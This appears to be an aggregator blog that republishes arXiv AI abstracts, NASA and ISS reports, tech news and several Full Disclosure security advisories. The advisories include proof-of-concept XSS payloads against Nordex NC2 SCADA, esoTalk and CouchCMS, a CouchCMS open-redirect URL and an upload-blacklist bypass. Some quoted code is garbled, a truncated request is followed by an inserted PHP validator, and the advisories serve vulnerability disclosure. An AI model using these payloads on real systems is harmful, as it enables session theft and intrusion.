Saturday, December 26, 2015

Chaconne in A major, Schrank II/38/38 (Anonymous)

Free public domain sheet music from IMSLP / Petrucci Music Library. (Redirected from Chaconne in A major Schrank II/38/38 (Anonymous)).

from Google Alert - anonymous http://ift.tt/1ZuwyA2
via IFTTT

I have a new follower on Twitter


Hans-Christian Preym
Co-founder of https://t.co/njQbUbrRgI Country manager at Ebbon-Dacs Deutschland GmbH and owner/MD of Universal Business Development GmbH
Salzburg Area | Austria

Following: 767 - Followers: 1124

December 26, 2015 at 05:03AM via Twitter http://twitter.com/HCPreymann

Friday, December 25, 2015

I have a new follower on Twitter


OMI
We assist businesses in engaging clients across Customer Lifecycles. #Marketing #Sales #CRM
Atlanta, GA
http://t.co/tYZMwofOLH
Following: 4508 - Followers: 5261

December 25, 2015 at 05:46AM via Twitter http://twitter.com/OMI4U

I have a new follower on Twitter


Big Cloud
Big thinking recruiters, specialising in Big Data, Data Science & Machine Learning. #BigData #DataScience #MachineLearning #InternetofThings #Analytics
World via Manchester
https://t.co/d1QRXoiGaM
Following: 2415 - Followers: 6166

December 25, 2015 at 05:31AM via Twitter http://twitter.com/BigCloudTeam

Star Colors and Pinyon Pine


Beautiful, luminous decorations on this pinyon pine tree are actually bright stars in the constellation Scorpius and the faint glow of the central Milky Way. Captured in June from the north rim of the Grand Canyon of planet Earth, the shallow, close-focus image has rendered pine needles on the tree branch sharp, but blurred the distant stars, their light smeared into remarkably colorful disks. Of course, temperature determines the color of a star. Most of the out-of-focus bright stars of Scorpius show a predominantly blue hue, their surface temperatures much hotter than the Sun's. Cooler and larger than the Sun, and noticeably redder on the scene, is giant star Antares at the heart of the scorpion. In focused, telescopic views the whitish disk at the upper right would be immediately recognizable, though, reflecting the Sun's light as ringed gas giant Saturn. via NASA http://ift.tt/1OpIO30

Thursday, December 24, 2015

Representation and Coding of Signal Geometry. (arXiv:1512.07636v1 [cs.IT])

Approaches to signal representation and coding theory have traditionally focused on how to best represent signals using parsimonious representations that incur the lowest possible distortion. Classical examples include linear and non-linear approximations, sparse representations, and rate-distortion theory. Very often, however, the goal of processing is to extract specific information from the signal, and the distortion should be measured on the extracted information. The corresponding representation should, therefore, represent that information as parsimoniously as possible, without necessarily accurately representing the signal itself.

In this paper, we examine the problem of encoding signals such that sufficient information is preserved about their pairwise distances and their inner products. For that goal, we consider randomized embeddings as an encoding mechanism and provide a framework to analyze their performance. We also demonstrate that it is possible to design the embedding such that it represents different ranges of distances with different precision. These embeddings also allow the computation of kernel inner products with control on their inner product-preserving properties. Our results provide a broad framework to design and analyze embeddings, and generalize existing results in this area, such as random Fourier kernels and universal embeddings.


from cs.AI updates on arXiv.org http://ift.tt/1QL8ebM
via IFTTT

The Max $K$-Armed Bandit: PAC Lower Bounds and Efficient Algorithms. (arXiv:1512.07650v1 [stat.ML])

We consider the Max $K$-Armed Bandit problem, where a learning agent is faced with several stochastic arms, each a source of i.i.d. rewards of unknown distribution. At each time step the agent chooses an arm, and observes the reward of the obtained sample. Each sample is considered here as a separate item with the reward designating its value, and the goal is to find an item with the highest possible value. Our basic assumption is a known lower bound on the {\em tail function} of the reward distributions. Under the PAC framework, we provide a lower bound on the sample complexity of any $(\epsilon,\delta)$-correct algorithm, and propose an algorithm that attains this bound up to logarithmic factors. We analyze the robustness of the proposed algorithm and in addition, we compare the performance of this algorithm to the variant in which the arms are not distinguishable by the agent and are chosen randomly at each stage. Interestingly, when the maximal rewards of the arms happen to be similar, the latter approach may provide better performance.


from cs.AI updates on arXiv.org http://ift.tt/1mhYOal
via IFTTT

Reinforcement Learning in Large Discrete Action Spaces. (arXiv:1512.07679v1 [cs.AI])

Being able to reason in an environment with a large number of discrete actions is essential to bringing reinforcement learning to a larger class of problems. Recommender systems, industrial plants and language models are only some of the many real-world tasks involving large numbers of discrete actions for which current methods can be difficult or even impossible to apply.

An ability to generalize over the set of actions as well as sub-linear complexity relative to the size of the set are both necessary to handle such tasks. Current approaches are not able to provide both of these, which motivates the work in this paper. Our proposed approach leverages prior information about the actions to embed them in a continuous space upon which it can generalize. Additionally, approximate nearest-neighbor methods allow for logarithmic-time lookup complexity relative to the number of actions, which is necessary for time-wise tractable training. This combined approach allows reinforcement learning methods to be applied to large-scale learning problems previously intractable with current methods. We demonstrate our algorithm's abilities on a series of tasks having up to one million actions.


from cs.AI updates on arXiv.org http://ift.tt/1kj4RtV
via IFTTT

Measuring pattern retention in anonymized data -- where one measure is not enough. (arXiv:1512.07721v1 [cs.AI])

In this paper, we explore how modifying data to preserve privacy affects the quality of the patterns discoverable in the data. For any analysis of modified data to be worth doing, the data must be as close to the original as possible. Therein lies a problem -- how does one make sure that modified data still contains the information it had before modification? This question is not the same as asking if an accurate classifier can be built from the modified data. Often in the literature, the prediction accuracy of a classifier made from modified (anonymized) data is used as evidence that the data is similar to the original. We demonstrate that this is not the case, and we propose a new methodology for measuring the retention of the patterns that existed in the original data. We then use our methodology to design three measures that can be easily implemented, each measuring aspects of the data that no pre-existing techniques can measure. These measures do not negate the usefulness of prediction accuracy or other measures -- they are complementary to them, and support our argument that one measure is almost never enough.


from cs.AI updates on arXiv.org http://ift.tt/1QL8bwA
via IFTTT

RDF2Rules: Learning Rules from RDF Knowledge Bases by Mining Frequent Predicate Cycles. (arXiv:1512.07734v1 [cs.AI])

Recently, several large-scale RDF knowledge bases have been built and applied in many knowledge-based applications. To further increase the number of facts in RDF knowledge bases, logic rules can be used to predict new facts based on the existing ones. Therefore, how to automatically learn reliable rules from large-scale knowledge bases becomes increasingly important. In this paper, we propose a novel rule learning approach named RDF2Rules for RDF knowledge bases. RDF2Rules first mines frequent predicate cycles (FPCs), a kind of interesting frequent pattern in knowledge bases, and then generates rules from the mined FPCs. Because each FPC can produce multiple rules, and an effective pruning strategy is used in the process of mining FPCs, RDF2Rules works very efficiently. Another advantage of RDF2Rules is that it uses the entity type information when generating and evaluating rules, which makes the learned rules more accurate. Experiments show that our approach outperforms the compared approach in terms of both efficiency and accuracy.


from cs.AI updates on arXiv.org http://ift.tt/1YBirf2
via IFTTT

Distinguishing cause from effect using observational data: methods and benchmarks. (arXiv:1412.3773v3 [cs.LG] UPDATED)

The discovery of causal relationships from purely observational data is a fundamental problem in science. The most elementary form of such a causal discovery problem is to decide whether X causes Y or, alternatively, Y causes X, given joint observations of two variables X, Y. An example is to decide whether altitude causes temperature, or vice versa, given only joint measurements of both variables. Even under the simplifying assumptions of no confounding, no feedback loops, and no selection bias, such bivariate causal discovery problems are challenging. Nevertheless, several approaches for addressing those problems have been proposed in recent years. We review two families of such methods: Additive Noise Methods (ANM) and Information Geometric Causal Inference (IGCI). We present the benchmark CauseEffectPairs that consists of data for 100 different cause-effect pairs selected from 37 datasets from various domains (e.g., meteorology, biology, medicine, engineering, economy, etc.) and motivate our decisions regarding the "ground truth" causal directions of all pairs. We evaluate the performance of several bivariate causal discovery methods on these real-world benchmark data and in addition on artificially simulated data. Our empirical results on real-world data indicate that certain methods are indeed able to distinguish cause from effect using only purely observational data, although more benchmark data would be needed to obtain statistically significant conclusions. One of the best performing methods overall is the additive-noise method originally proposed by Hoyer et al. (2009), which obtains an accuracy of 63 ± 10% and an AUC of 0.74 ± 0.05 on the real-world benchmark. As the main theoretical contribution of this work we prove the consistency of that method.


from cs.AI updates on arXiv.org http://ift.tt/1BkdJ60
via IFTTT

The Information-theoretic and Algorithmic Approach to Human, Animal and Artificial Cognition. (arXiv:1501.04242v5 [cs.AI] UPDATED)

We survey concepts at the frontier of research connecting artificial, animal and human cognition to computation and information processing---from the Turing test to Searle's Chinese Room argument, from Integrated Information Theory to computational and algorithmic complexity. We start by arguing that passing the Turing test is a trivial computational problem and that its pragmatic difficulty sheds light on the computational nature of the human mind more than it does on the challenge of artificial intelligence. We then review our proposed algorithmic information-theoretic measures for quantifying and characterizing cognition in various forms. These are capable of accounting for known biases in human behavior, thus vindicating a computational algorithmic view of cognition as first suggested by Turing, but this time rooted in the concept of algorithmic probability, which in turn is based on computational universality while being independent of computational model, and which has the virtue of being predictive and testable as a model theory of cognitive behavior.


from cs.AI updates on arXiv.org http://ift.tt/1yjpIlb
via IFTTT

Online Context-Dependent Clustering in Recommendations based on Exploration-Exploitation Algorithms. (arXiv:1502.03473v4 [cs.LG] UPDATED)

We investigate two context-dependent clustering techniques for content recommendation based on exploration-exploitation strategies in contextual multiarmed bandit settings. Our algorithms dynamically group users based on the items under consideration and, possibly, group items based on the similarity of the clusterings induced over the users. The resulting algorithm thus takes advantage of preference patterns in the data in a way akin to collaborative filtering methods. We provide an empirical analysis on extensive real-world datasets, showing scalability and increased prediction performance over state-of-the-art methods for clustering bandits. For one of the two algorithms we also give a regret analysis within a standard linear stochastic noise setting.


from cs.AI updates on arXiv.org http://ift.tt/1Dn3PTW
via IFTTT

jobs from Anonymous

Anonymous. Chartered Building Contractor based in North London carrying out local authority repairs and maintenance for a number of main ...

from Google Alert - anonymous http://ift.tt/22qNDx1
via IFTTT

[FD] eWON sa Industrial router - Multiple Vulnerabilities

[FD] Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS

*Nordex NC2 XSS Vulnerability*

*AFFECTED PRODUCTS*
Nordex Control 2 (NC2) SCADA V16 and prior versions. Nordex is a company based in Germany that maintains offices in countries around the world. The affected product, Nordex Control 2, is a web-based SCADA system for wind power plants. According to Nordex, NC2 is deployed across the Energy sector. Nordex estimates that this product is used primarily in the United States, Europe, and China.

*CVE-ID*
CVE-2015-6477

*Reference*
http://ift.tt/1PdZkSQ

*Vulnerable parameter*
username

*PoC*
POST /login HTTP/1.1
connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en

Source: Gmail -> IFTTT-> Blogger

[FD] XZERES 442SR Wind Turbine XSS

ISS Daily Summary Report – 12/23/15

62 Progress (62P) Docking: 62P completed its 34-orbit rendezvous with ISS and successfully docked to Docking Compartment (DC)-1 at 4:27 AM CST. After docking, Volkov successfully performed leak checks and subsequently opened the hatches.

Biochemical Profile and Cardio Ox: Peake has performed his Flight Day 15 session blood and urine collections for the Biochem Profile and Cardio Ox investigations. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. The objective of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts.

Ocular Health: Kelly and Kornienko completed Optical Coherence Tomography (OCT) testing and Kelly performed a fundoscopy activity in support of the Ocular Health investigation. OCT is used to measure retinal thickness, volume, and retinal nerve fiber layer, and the fundoscope is used to obtain images of the retinal surface. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines.

Extravehicular Mobility Unit Loop Scrub: Kopra configured Extravehicular Mobility Unit (EMU) suits 3010 and 3011 for loop scrubbing. Once the scrubbing activity was complete, he reconfigured hardware in order to perform Iodination of Ion Filters for both suits. Samples containing 250 mL of the water were obtained after the loop scrub activity to determine the effectiveness of the filtering. 10 mL of this water sample were used for a conductivity test onboard ISS and the remaining water will be sent to the ground for chemical analysis.

Spare Sequential Shunt Unit (SSU) Checkout: Peake configured the port Maintenance Work Area (MWA) within Node 2 and connected power and data cables onto a spare SSU. Once cables were connected, power was applied to the SSU and a ground-led checkout was successfully performed to ensure valid operation of the SSU’s firmware. The checkout confirmed no health flags and associated refreshes were completed. The SSU has been declared GO to replace SSU 1B during an Extravehicular Activity (EVA) planned for January 15th. The currently installed SSU had experienced an anomaly last month on November 13th.

Today’s Planned Activities: All activities were completed unless otherwise noted. HRF Urine Sample Collection SLEEP Questionnaire Closing USOS Window Shutters HRF – Sample MELFI Insertion Activation/Deactivation of MPEG2 Multicast TV Data Monitoring Closing window 6,8,9,12,13,14 shutters OCT Hardware Setup Eye Examination, Subject Eye Examination, Operator VIBROLAB. 
Monitoring hardware activation Preparation for ТКГ 431 Docking HRF – Review Big Picture Words WHC – Full Fill Replacement of MSPR-ELT Laptop ТКГ 431 Docking to DC1 WRS Water Sample Analysis High Definition Video Camera Assembly (HD-VCA) Remove & Replace WRS – Recycle Tank Fill from EDV СОЖ Maintenance Activation of TV data and MPEG2 Multicast Controls VEG-01 Fan Speed Change ТКГ 431 Docking to DC1 Crew time for ISS adaptation and orientation WHC Fill On MCC Go Activation of MPEG2 Multicast Recording Mode on CP SSC ТКГ 431 Docking to DC1 Video Footage for Nauka 2.0 TV Channel Closing Applications and Downlink of MPEG2 Multicast Video via OCA HRF Urine Sample Collection HRF – Sample MELFI Insertion Food Frequency Questionnaire Start EMU cooling loop scrub On MCC Go ТКГ 431 and DC1 Interface Leak Check On-orbit hearing assessment using EARQ Crew time for ISS adaptation and orientation HRF Urine Sample Collection ARED Flywheel Cylinder Evacuation HRF – Sample MELFI Insertion Optical Coherence Tomography (OCT) – Eye Exam DC1-СУ Hatch Opening On MCC Go Opening of ТКГ-СУ Transfer Hatch OCT Hardware Stowage IDENTIFICATION. Copy ИМУ-Ц micro-accelerometer data to laptop HRF – Hardware Setup Installation of Quick Release Screw Clamps (ЗВБ) on DC1-Progress 431 Interface Sequential Shunt Unit (SSU) Setup from the Spares Kit WRS – Recycle Tank Fill from EDV ТКГ 431 (DC1) deactivation, air duct installation ТКГ 431 (DC1) Air Sampling using АК-1М sampler Assistance in Sequential Shunt Unit (SSU) Test Initiate EMU Cooling Loop Scrub Part 1 Photo of a scuffmark left by the Active Docking Mechanism Probe on DC1 АСП Receiving Cone after Progress 431 Docking Start EMU cooling loop scrub Downlink Docking Cone Internal Surface Photos and Data via OCA ТКГ 431 (DC1) Early Unstow and US Cargo Items Transfers and IMS Ops EMU – Conductivity Test Crew time for ISS adaptation and orientation Terminate METOX Regeneration VIBROLAB. 
Copy and Downlink Data ТКГ 431 (DC1) Early Unstow and US Cargo Items Transfers and IMS Ops EMU Boot Inspection TOCA Data Recording Environmental Control and Life Support (ECL) Battery Removal Fundoscope Setup for exam MARROW – Sample Processing EMU – Cooling Loop Maintenance – EMU Reconfig Fundoscope – Vision Test Fundoscope – Eye Exam CONTENT. Experiment Ops INTERACTION-2. Experiment Ops EMU – Long Dryout Equipment stowage after Fundoscope Eye Imaging HRF Urine Sample Collection Evening Work Prep HRF – Sample MELFI Insertion HRF – Review Big Picture Words URISYS Hardware Setup ISS HAM – Activation of ISS HAM Radio and Video In-flight Maintenance (IFM).  Disconnecting Sequential Shunt Unit (SSU) from UOP Stow Syringes used in Н2О Conductivity Test IMS Delta File Prep Installation of inserts to ease opening of SM interior panel locks (Unstow Элементы конструкции (Structural Elements) kit (004890R), ФГБ1ПГО_4_427_1, СТВ No.1112 (004106J) Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observation and Photography URAGAN Observations and Photography Video Recording for All-Russia State Television and Radio Broadcasting Company (ВГТРК)   Completed Task List Items EVA-SEMU Launch Enclosure Deltas Training   Ground Activities All activities were completed […]

from ISS On-Orbit Status Report http://ift.tt/1QYQdFh
via IFTTT

Want WhatsApp Free Video Calling? This Leaked Screenshot Reveals Upcoming Feature

Raise your hands if you want a Free Video Calling feature in WhatsApp. I am in, and I think most of you are too. And the good news is that WhatsApp's much-awaited Free Video Calling feature appears to be on its way, according to recently leaked screenshots. Free Video Calling Feature in WhatsApp: German technology blog Macerkopf.de has posted what it claims are


from The Hacker News http://ift.tt/1NE1kRu
via IFTTT

India temporarily Bans Facebook's Free Internet Service

Facebook's free Internet access in India has hit a hurdle: The Telecom Regulatory Authority of India (TRAI) has ordered the mobile carrier to temporarily suspend Facebook's Free Basics Internet program. Facebook's Free Basics is an app that allows users to access certain Internet websites, including Facebook, for free. However, India's independent regulatory body has asked


from The Hacker News http://ift.tt/1m7llY7
via IFTTT

Ocean City, MD's surf is at least 6.53ft high

Maryland-Delaware, December 29, 2015 at 02:00AM

Ocean City, MD Summary
At 2:00 AM, surf min of 6.53ft. At 8:00 AM, surf min of 5.42ft. At 2:00 PM, surf min of 4.12ft. At 8:00 PM, surf min of 3.2ft.

Surf maximum: 7.53ft (2.3m)
Surf minimum: 6.53ft (1.99m)
Tide height: 0.45ft (0.14m)
Wind direction: E
Wind speed: 20.51 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Hyatt Hotel Says Payment Systems Hacked with Credit-Card Stealing Malware

Hyatt Hotels Corporation is notifying its customers that credit card numbers and other sensitive information may have been stolen after it found malware on the computers that process customer payments. "We recently identified malware on computers that operate the payment processing systems for Hyatt-managed locations," the company announced on Wednesday. "As soon as we discovered the


from The Hacker News http://ift.tt/1YzEvqH
via IFTTT

Geminid Meteors over Xinglong Observatory


Where do Geminid meteors come from? In terms of location on the sky, as the featured image composite beautifully demonstrates, the sand-sized bits of rock that create the streaks of the Geminid Meteor Shower appear to flow out from the constellation of Gemini. In terms of parent body, Solar System trajectories point to the asteroid 3200 Phaethon -- but this results in a bit of a mystery since that unusual object appears mostly dormant. Perhaps, 3200 Phaethon undergoes greater dust-liberating events than we know, but even if so, exactly what happens and why remains a riddle. Peaking last week, over 50 meteors including a bright fireball were captured streaking above Xinglong Observatory in China. Since the Geminids of December are one of the most predictable and active meteor showers, investigations into details of its origin are likely to continue. via NASA http://ift.tt/1RGdL3e

Wednesday, December 23, 2015

Re: [FD] Executable installers are vulnerable^WEVIL (case 15): F-SecureOnlineScanner.exe allows arbitrary (remote) code execution and escalation of privilege

Two Denton Churches Receive Anonymous Threats

Two different churches, two anonymous letters and one chilling message: Stop Christmas Eve services or your churches will be bombed.

from Google Alert - anonymous http://ift.tt/1OoRZ3A
via IFTTT

The ERA of FOLE: Foundation. (arXiv:1512.07430v1 [cs.DB])

This paper discusses the representation of ontologies in the first-order logical environment FOLE (Kent 2013). An ontology defines the primitives with which to model the knowledge resources for a community of discourse (Gruber 2009). These primitives, consisting of classes, relationships and properties, are represented by the entity-relationship-attribute ERA data model (Chen 1976). An ontology uses formal axioms to constrain the interpretation of these primitives. In short, an ontology specifies a logical theory. This paper is the first in a series of three papers that provide a rigorous mathematical representation for the ERA data model in particular, and ontologies in general, within the first-order logical environment FOLE. The first two papers show how FOLE represents the formalism and semantics of (many-sorted) first-order logic in a classification form corresponding to ideas discussed in the Information Flow Framework (IFF). In particular, this first paper provides a foundation that connects elements of the ERA data model with components of the first-order logical environment FOLE, and the second paper provides a superstructure that extends FOLE to the formalisms of first-order logic. The third paper defines an interpretation of FOLE in terms of the transformational passage, first described in (Kent 2013), from the classification form of first-order logic to an equivalent interpretation form, thereby defining the formalism and semantics of first-order logical/relational database systems (Kent 2011). The FOLE representation follows a conceptual structures approach that is completely compatible with formal concept analysis (Ganter and Wille 1999) and information flow (Barwise and Seligman 1997).


from cs.AI updates on arXiv.org http://ift.tt/1U5Ns4c
via IFTTT

Selecting the top-quality item through crowd scoring. (arXiv:1512.07487v1 [cs.AI])

We investigate crowdsourcing algorithms for finding the top-quality item within a large collection of objects with unknown intrinsic quality values. This is an important problem with many relevant applications, for example in networked recommendation systems. The core of the algorithms is that objects are distributed to crowd workers, who return a noisy evaluation. All received evaluations are then combined, to identify the top-quality object. We first present a simple probabilistic model for the system under investigation. Then, we devise and study a class of efficient adaptive algorithms to assign in an effective way objects to workers. We compare the performance of several algorithms, which correspond to different choices of the design parameters/metrics. We finally compare our approach based on scoring object qualities against traditional proposals based on comparisons and tournaments.


from cs.AI updates on arXiv.org http://ift.tt/1U5Nqta
via IFTTT

Randomized Social Choice Functions Under Metric Preferences. (arXiv:1512.07590v1 [cs.AI])

We determine the quality of randomized social choice mechanisms in a setting in which the agents have metric preferences: every agent has a cost for each alternative, and these costs form a metric. We assume that these costs are unknown to the mechanisms (and possibly even to the agents themselves), which means we cannot simply select the optimal alternative, i.e. the alternative that minimizes the total agent cost (or median agent cost). However, we do assume that the agents know their ordinal preferences that are induced by the metric space. We examine randomized social choice functions that require only this ordinal information and select an alternative that is good in expectation with respect to the costs from the metric. To quantify how good a randomized social choice function is, we bound the distortion, which is the worst-case ratio between expected cost of the alternative selected and the cost of the optimal alternative. We provide new distortion bounds for a variety of randomized mechanisms, for both general metrics and for important special cases. Our results show a sizable improvement in distortion over deterministic mechanisms.


from cs.AI updates on arXiv.org http://ift.tt/1NMDX68
via IFTTT

Putting Things in Context: Community-specific Embedding Projections for Sentiment Analysis. (arXiv:1511.06052v2 [cs.CL] UPDATED)

Variation in language is ubiquitous, and is particularly evident in newer forms of writing such as social media. Fortunately, variation is not random, but is usually linked to social factors. By exploiting linguistic homophily --- the tendency of socially linked individuals to use language similarly --- it is possible to build models that are more robust to variation. In this paper, we focus on social network communities, which make it possible to generalize sociolinguistic properties from authors in the training set to authors in the test sets, without requiring demographic author metadata. We detect communities via standard graph clustering algorithms, and then exploit these communities by learning community-specific projections of word embeddings. These projections capture shifts in word meaning in different social groups; by modeling them, we are able to improve the overall accuracy of Twitter sentiment analysis by a significant margin over competitive prior work.


from cs.AI updates on arXiv.org http://ift.tt/1kJ97UX
via IFTTT

Anonymous donor leaves check for $50000 at nativity scene

Donor says he was inspired by the children helped at Texas center.

from Google Alert - anonymous http://ift.tt/1IrFgLa
via IFTTT

Hacking group Anonymous declares 'cyber war' on Turkey for

HACKING group Anonymous has declared war on Turkey after accusing the country of “supporting” ISIS. CYBER WAR: Anonymous has declared war ...

from Google Alert - anonymous http://ift.tt/1JvQWYn
via IFTTT

Dirtyphonics

Stream Dirtyphonics - Anonymous VIP by Dirtyphonics from desktop or your mobile device.

from Google Alert - anonymous http://ift.tt/1RHcpFn
via IFTTT

I have a new follower on Twitter


Daniel Barth-Jones
#HIPAA Health Data #Privacy De-identification, HIV/Inf Dis/Computnl/Digital Epidemiology, Vaccinology, #DataScience, #BigData, #GIS, UrbanScience, Public Policy
Columbia University, NYC
http://t.co/rBga3M1HPc
Following: 6445 - Followers: 5890

December 23, 2015 at 01:36PM via Twitter http://twitter.com/dbarthjones

[FD] esoTalk 1.0.0g4: XSS

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: esoTalk 1.0.0g4
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: toby@esotalk.org
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: esoTalk is a light-weight forum software written in PHP. In version 1.0.0g4 and possibly prior versions, there is a reflected XSS vulnerability in the search because a given URL is echoed unencoded in multiple places. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection.

3. Proof of Concept
http://localhost/esoTalk-1.0.0g4/conversations/a'">?search=test

4. Solution
This issue was not fixed by the vendor.

5. Report Timeline
11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference: http://ift.tt/1PknJUw

Source: Gmail -> IFTTT-> Blogger

[FD] CouchCMS 1.4.5: Code Execution

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: CouchCMS 1.4.5
Fixed in: 1.4.7
Fixed Version Link: http://ift.tt/1Psz3AY
Vendor Website: http://ift.tt/RkwNdm
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
Description: When uploading a file, the file extension is checked against a blacklist. This blacklist misses at least pht, which is executed by most default Apache configurations. The uploaded file must be a valid image file, but an attacker can bypass this restriction. Admin credentials are required to upload files. A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files, for example for performance reasons. Apache for example ignores htaccess files by default since version 2.3.9.

3. Proof of Concept
POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Type: multipart/form-data; boundary
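The advisory's point is that an extension blacklist (which forgot .pht) plus a .htaccess the server may never read is the wrong shape of check. The following is an added example, not CouchCMS or KCFinder code: an allowlist of extensions, a content check via the fileinfo extension and getimagesize(), and a server-generated file name so the client never chooses what lands on disk.

```php
<?php
// Added example (not CouchCMS code): allowlist-based image upload validation.
// Assumes the fileinfo extension is loaded.

// Allowlist: extension => MIME type that fileinfo must report for the content.
const IMAGE_ALLOWLIST = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Returns a server-generated storage name for an acceptable image upload,
 * or null when the upload must be rejected.
 *
 * @param string $clientName file name as sent by the client ($_FILES['f']['name'])
 * @param string $tmpPath    path of the uploaded content ($_FILES['f']['tmp_name'])
 */
function storageNameForImageUpload(string $clientName, string $tmpPath): ?string
{
    // The extension is consulted only to pick an *allowlisted* target name;
    // "shell.pht", "shell.phtml" or "shell.php" never match anything here,
    // so nothing has to enumerate every extension a server might execute.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(IMAGE_ALLOWLIST[$ext])) {
        return null;
    }

    // Check the content, not the name: fileinfo reads the magic bytes, and
    // getimagesize() must be able to parse an image header with real dimensions.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== IMAGE_ALLOWLIST[$ext]) {
        return null;
    }
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[0] < 1 || $info[1] < 1) {
        return null;
    }

    // Random, server-chosen name with an allowlisted extension. Store the file
    // outside the document root (or on a host with no script handlers) so the
    // check does not depend on a .htaccess file being honoured.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// --- Demo with constructed inputs: a minimal 1x1 GIF and a PHP stub ---
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
     . "\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";
$phpStub = "<?php echo 'not an image';";

$cases = [
    ['photo.gif', $gif],      // extension and content agree: accepted
    ['shell.pht', $gif],      // valid image bytes, but .pht is not allowlisted
    ['photo.gif', $phpStub],  // allowlisted name, but the content is not a GIF
];
foreach ($cases as [$name, $content]) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $content);
    $stored = storageNameForImageUpload($name, $tmp);
    unlink($tmp);
    printf("%-10s -> %s\n", $name, $stored ?? 'rejected');
}
```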

Source: Gmail -> IFTTT-> Blogger

[FD] CouchCMS 1.4.5: XSS & Open Redirect

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: CouchCMS 1.4.5
Fixed in: 1.4.7
Fixed Version Link: http://ift.tt/1Psz3AY
Vendor Website: http://ift.tt/RkwNdm
Vulnerability Type: XSS & Open Redirect
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: CouchCMS 1.4.5 contains two reflected XSS and one open redirect vulnerability. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection.

3. Details

XSS 1
When displaying a post, the name of any additional GET parameters is echoed unencoded, leading to XSS.
Proof of Concept:
http://localhost/CouchCMS-1.4.5/blog.php?p=5&foo">bar=1
Code:
    function getPaginationString( $page = 1, $totalitems, $limit = 15, $adjacents = 1, $targetpage = "/", $pagestring = "?page=", $prev_text, $next_text, $simple ){
        [...]
        $pagination .= "$counter";
        [...]
        $pagination .= "$counter";
        [...]
        $pagination .= "$lpm1";
        $pagination .= "$lastpage";
        [... (all $targetpage . $pagestring are affected) ...]
    }

XSS 2
When displaying comments, the name of any additional GET parameters is echoed unencoded, leading to XSS.
Proof of Concept:
http://localhost/CouchCMS-1.4.5/couch/?o=comments&foo">bar=1
Code: /couch/edit-comments.php
    [...]
    | t('view'); ?> | t('edit'); ?> | t('delete'); ?>

Open Redirect
The filter which checks if a user supplied redirect value leads to external pages can be bypassed by an attacker.
Proof of Concept (Only works for logged in victims or after login):
http://localhost/CouchCMS-1.4.5/couch/login.php?redirect=//google.com
Code: /couch/auth/auth.php
    function redirect( $dest ){
        global $FUNCS, $DB;

        // sanity checks
        $dest = $FUNCS->sanitize_url( trim($dest) );
        if( !strlen($dest) ){
            $dest = ( $this->user->access_level < K_ACCESS_LEVEL_ADMIN ) ? K_SITE_URL : K_ADMIN_URL . K_ADMIN_PAGE;
        }
        elseif( strpos(strtolower($dest), 'http')===0 ){
            if( strpos($dest, K_SITE_URL)!==0 ){
                // we don't allow redirects external to our site
                $dest = K_SITE_URL;
            }
        }

        $DB->commit( 1 );
        header( "Location: ".$dest );
        die();
    }

4. Solution
To mitigate this issue please upgrade at least to version 1.4.7: http://ift.tt/1Psz3AY
Please note that a newer version might already be available.

5. Report Timeline
11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public

Blog Reference: http://ift.tt/1JuUfic
